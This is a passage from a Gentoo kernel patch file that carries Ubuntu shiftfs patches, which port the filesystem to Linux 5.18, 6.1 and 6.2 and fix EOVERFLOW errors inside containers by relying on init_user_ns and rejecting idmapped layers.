revert_creds(oldcred); - - return err; -@@ -776,7 +774,7 @@ static int shiftfs_setattr(struct user_namespace *ns, struct dentry *dentry, str - struct shiftfs_super_info *sbinfo = 
sb->s_fs_info; - int err; - -- err = setattr_prepare(ns, dentry, attr); -+ err = setattr_prepare(&init_user_ns, dentry, attr); - if (err) - return err; - -@@ -793,7 +791,7 @@ static int shiftfs_setattr(struct user_namespace *ns, struct dentry *dentry, str - - inode_lock(loweri); - oldcred = shiftfs_override_creds(dentry->d_sb); -- err = notify_change(ns, lowerd, &newattr, NULL); -+ err = notify_change(&init_user_ns, lowerd, &newattr, NULL); - revert_creds(oldcred); - inode_unlock(loweri); - -@@ -980,10 +978,10 @@ shiftfs_posix_acl_xattr_set(const struct xattr_handler *handler, - shift_acl_xattr_ids(inode->i_sb->s_user_ns, - loweri->i_sb->s_user_ns, - (void *)value, size); -- err = shiftfs_setxattr(ns, dentry, inode, handler->name, value, -+ err = shiftfs_setxattr(dentry, inode, handler->name, value, - size, flags); - } else { -- err = shiftfs_removexattr(ns, dentry, handler->name); -+ err = shiftfs_removexattr(&init_user_ns, dentry, handler->name); - } - - if (!err) --- -2.39.2 - -From 3d0ac0887b4a57d883d194a6836501fa77aaf6e3 Mon Sep 17 00:00:00 2001 -From: Andrea Righi <andrea.righi@canonical.com> -Date: Wed, 27 Apr 2022 18:20:41 +0200 -Subject: [PATCH] UBUNTU: SAUCE: shiftfs: fix missing include required in 5.18 -Cc: mpagano@gentoo.org - -Signed-off-by: Andrea Righi <andrea.righi@canonical.com> -Signed-off-by: Mike Pagano <mpagano@gentoo.org> ---- - fs/shiftfs.c | 1 + - 1 file changed, 1 insertion(+) - -diff --git a/fs/shiftfs.c b/fs/shiftfs.c -index a21624c529f0..a5338dc6290c 100644 ---- a/fs/shiftfs.c -+++ b/fs/shiftfs.c -@@ -21,6 +21,7 @@ - #include <linux/posix_acl_xattr.h> - #include <linux/uio.h> - #include <linux/fiemap.h> -+#include <linux/pagemap.h> - - struct shiftfs_super_info { - struct vfsmount *mnt; --- -2.39.2 - -From 6cbfd564842eeb9adb495a3de704d125418825f9 Mon Sep 17 00:00:00 2001 -From: Andrea Righi <andrea.righi@canonical.com> -Date: Tue, 18 Oct 2022 17:09:12 +0200 -Subject: [PATCH] UBUNTU: SAUCE: shiftfs: support kernel 6.1 -Cc: 
mpagano@gentoo.org - -Signed-off-by: Andrea Righi <andrea.righi@canonical.com> -Signed-off-by: Mike Pagano <mpagano@gentoo.org> ---- - fs/shiftfs.c | 5 ++--- - 1 file changed, 2 insertions(+), 3 deletions(-) - -diff --git a/fs/shiftfs.c b/fs/shiftfs.c -index a5338dc6290c..34f080ae0fec 100644 ---- a/fs/shiftfs.c -+++ b/fs/shiftfs.c -@@ -747,19 +747,18 @@ static int shiftfs_fiemap(struct inode *inode, - } - - static int shiftfs_tmpfile(struct user_namespace *ns, -- struct inode *dir, struct dentry *dentry, -+ struct inode *dir, struct file *file, - umode_t mode) - { - int err; - const struct cred *oldcred; -- struct dentry *lowerd = dentry->d_fsdata; - struct inode *loweri = dir->i_private; - - if (!loweri->i_op->tmpfile) - return -EOPNOTSUPP; - - oldcred = shiftfs_override_creds(dir->i_sb); -- err = loweri->i_op->tmpfile(&init_user_ns, loweri, lowerd, mode); -+ err = loweri->i_op->tmpfile(&init_user_ns, loweri, file, mode); - revert_creds(oldcred); - - return err; --- -2.39.2 - -From a04c96a9da98441b39fd8425d19d2ae6d92c0bf9 Mon Sep 17 00:00:00 2001 -From: Andrea Righi <andrea.righi@canonical.com> -Date: Wed, 4 Jan 2023 10:25:30 +0100 -Subject: [PATCH] UBUNTU: SAUCE: shiftfs: support linux 6.2 -Cc: mpagano@gentoo.org - -Signed-off-by: Andrea Righi <andrea.righi@canonical.com> -Signed-off-by: Mike Pagano <mpagano@gentoo.org> ---- - fs/shiftfs.c | 8 ++++---- - 1 file changed, 4 insertions(+), 4 deletions(-) - -diff --git a/fs/shiftfs.c b/fs/shiftfs.c -index 34f080ae0fec..cda74b614505 100644 ---- a/fs/shiftfs.c -+++ b/fs/shiftfs.c -@@ -912,7 +912,7 @@ shiftfs_get_acl(struct inode *inode, int type, bool rcu) - return NULL; - - oldcred = shiftfs_override_creds(inode->i_sb); -- lower_acl = get_acl(loweri, type); -+ lower_acl = get_inode_acl(loweri, type); - revert_creds(oldcred); - - if (lower_acl && !IS_ERR(lower_acl)) { -@@ -1026,13 +1026,13 @@ static const struct inode_operations shiftfs_dir_inode_operations = { - .permission = shiftfs_permission, - .getattr = 
shiftfs_getattr, - .listxattr = shiftfs_listxattr, -- .get_acl = shiftfs_get_acl, -+ .get_inode_acl = shiftfs_get_acl, - }; - - static const struct inode_operations shiftfs_file_inode_operations = { - .fiemap = shiftfs_fiemap, - .getattr = shiftfs_getattr, -- .get_acl = shiftfs_get_acl, -+ .get_inode_acl = shiftfs_get_acl, - .listxattr = shiftfs_listxattr, - .permission = shiftfs_permission, - .setattr = shiftfs_setattr, -@@ -1041,7 +1041,7 @@ static const struct inode_operations shiftfs_file_inode_operations = { - - static const struct inode_operations shiftfs_special_inode_operations = { - .getattr = shiftfs_getattr, -- .get_acl = shiftfs_get_acl, -+ .get_inode_acl = shiftfs_get_acl, - .listxattr = shiftfs_listxattr, - .permission = shiftfs_permission, - .setattr = shiftfs_setattr, --- -2.39.2 - -From 63014ad24c3b175e503324461ded0a6a8ed12ab6 Mon Sep 17 00:00:00 2001 -From: Alexander Mikhalitsyn <aleksandr.mikhalitsyn@canonical.com> -Date: Tue, 31 Jan 2023 17:11:48 +0100 -Subject: [PATCH] UBUNTU: SAUCE: shiftfs: fix -EOVERFLOW inside the container -Cc: mpagano@gentoo.org - -BugLink: https://bugs.launchpad.net/bugs/1990849 - -We haven't supported idmapped layers with shiftfs and moreover, that makes -no sense. Once lower fs support idmapped mounts when shiftfs is not needed. - -Starting from linux-image-5.15.0-48-generic users started seeing EOVERFLOW -errors from the userspace side on a trivial fs operations inside the containers. - -This is caused by patches ("fs: tweak fsuidgid_has_mapping()"), -("fs: support mapped mounts of mapped filesystems"). These patches extends -and enables idmapped mounts support in Ubuntu kernel, but the problem is -that shiftfs was not properly ported. 
- -See also: -("namei: prepare for idmapped mounts") -https://lore.kernel.org/all/20210121131959.646623-15-christian.brauner@ubuntu.com/ -("overlayfs: do not mount on top of idmapped mounts") -https://lore.kernel.org/all/20210121131959.646623-29-christian.brauner@ubuntu.com/ -as a reference. - -This patch should be appied on top of kinetic/master-next and based on the -changes by Andrea Righi 4c934edc66 ("UBUNTU: SAUCE: shiftfs: always rely on init_user_ns") - -This commit together with 4c934edc66 ("UBUNTU: SAUCE: shiftfs: always rely on init_user_ns") -have to be ported to the jammy tree too. - -Fixes: d347e71d2c0 ("UBUNTU: [SAUCE] shiftfs: support kernel 5.15") -Reported-by: Thomas Parrott <thomas.parrott@canonical.com> -Signed-off-by: Alexander Mikhalitsyn <aleksandr.mikhalitsyn@canonical.com> -Acked-by: Tim Gardner <tim.gardner@canonical.com> -Acked-by: Andrea Righi <andrea.righi@canonical.com> -Signed-off-by: Andrea Righi <andrea.righi@canonical.com> -Signed-off-by: Mike Pagano <mpagano@gentoo.org> ---- - fs/shiftfs.c | 16 +++++++++++++--- - 1 file changed, 13 insertions(+), 3 deletions(-) - -diff --git a/fs/shiftfs.c b/fs/shiftfs.c -index cda74b614505..2664e1fb65d3 100644 ---- a/fs/shiftfs.c -+++ b/fs/shiftfs.c -@@ -632,10 +632,10 @@ static int shiftfs_rename(struct user_namespace *ns, - struct inode *loweri_dir_old = lowerd_dir_old->d_inode, - *loweri_dir_new = lowerd_dir_new->d_inode; - struct renamedata rd = { -- .old_mnt_userns = ns, -+ .old_mnt_userns = &init_user_ns, - .old_dir = loweri_dir_old, - .old_dentry = lowerd_old, -- .new_mnt_userns = ns, -+ .new_mnt_userns = &init_user_ns, - .new_dir = loweri_dir_new, - .new_dentry = lowerd_new, - }; -@@ -971,7 +971,7 @@ shiftfs_posix_acl_xattr_set(const struct xattr_handler *handler, - return -EOPNOTSUPP; - if (handler->flags == ACL_TYPE_DEFAULT && !S_ISDIR(inode->i_mode)) - return value ? 
-EACCES : 0; -- if (!inode_owner_or_capable(ns, inode)) -+ if (!inode_owner_or_capable(&init_user_ns, inode)) - return -EPERM; - - if (value) { -@@ -2015,6 +2015,16 @@ static int shiftfs_fill_super(struct super_block *sb, void *raw_data, - goto out_put_path; - } - -+ /* -+ * It makes no sense to handle idmapped layers from shiftfs. -+ * And we didn't support it properly anyway. -+ */ -+ if (is_idmapped_mnt(path.mnt)) { -+ err = -EINVAL; -+ pr_err("idmapped layers are currently not supported\n"); -+ goto out_put_path; -+ } -+ - sb->s_flags |= SB_POSIXACL; - - if (sbinfo->mark) { --- -2.39.2 - |